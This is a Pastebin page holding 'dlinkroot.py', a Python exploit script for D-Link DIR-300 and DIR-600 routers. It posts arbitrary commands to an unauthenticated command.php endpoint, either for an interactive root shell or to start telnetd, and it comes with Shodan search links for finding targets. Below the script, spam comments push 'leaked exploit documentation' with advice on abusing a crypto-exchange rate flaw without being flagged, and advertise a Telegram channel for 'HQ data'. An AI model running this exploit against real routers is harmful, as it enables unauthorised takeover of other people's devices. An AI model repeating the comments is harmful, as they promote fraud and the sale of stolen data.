infodox

dlinkroot.py

Feb 7th, 2013
2,056
0
Never
7
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.60 KB | None | 0 0
  1. #!/usr/bin/python
  2. # D-LINK TOTAL FAIL
  3. # Adv: http://www.s3cur1ty.de/m1adv2013-003
  4. # SHODANS BELOW
  5. # http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300
  6. # http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600
  7. # Who knew a shell could be so easy?
  8. # @info_dox - insecurety.net
  9. import sys
  10. import os
  11. import requests
  12.  
  13. if len(sys.argv) != 3:
  14. print "Usage: ./dlinkroot.py <target> <mode>"
  15. print "Modes: shell or telnetenable"
  16. print "I was lazy so I assume you have a telnet client"
  17. sys.exit(0)
  18.  
  19. target = sys.argv[1]
  20. mode = sys.argv[2]
  21.  
  22. def shell(target):
  23. print "[+] Connecting and spawning a shell..."
  24. while True:
  25. try:
  26. bobcat = raw_input("%s:~# " %(target))
  27. lulz = "cmd=%s;" %(bobcat)
  28. url = "http://" + target + "/command.php"
  29. hax = requests.post(url, lulz)
  30. print hax.text
  31. except KeyboardInterrupt:
  32. print "\n[-] Quitting"
  33. sys.exit(1)
  34.  
  35. def telnetenable(target):
  36. lulz = "cmd=telnetd;"
  37. url = "http://" + target + "/command.php"
  38. print "[+] Trying to enable telnet"
  39. try:
  40. hax = requests.post(url, lulz)
  41. print hax.text
  42. except Exception:
  43. print "[-] IT FAILED IT!"
  44. sys.exit(0)
  45. print "[+] Doing a telnet"
  46. try:
  47. os.system('telnet %s') %(target)
  48. except Exception:
  49. print "[-] IT FAILED IT!"
  50. sys.exit(1)
  51.  
  52. if mode == "shell":
  53. shell(target)
  54. elif mode == "telnetenable":
  55. telnetenable(target)
  56. else:
  57. print "[:(] WHAT THE FUCK YOU'RE DOING IT WRONG!"
Advertisement
Comments
  • Comment was deleted
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • Borlenor
    13 days
    # CSS 0.85 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
  • Garmilir
    6 days
    # CSS 0.06 KB | 0 0
    1. We just shared HQ data on our channel: https://t.me/theprotocolone
Add Comment
Please, Sign In to add comment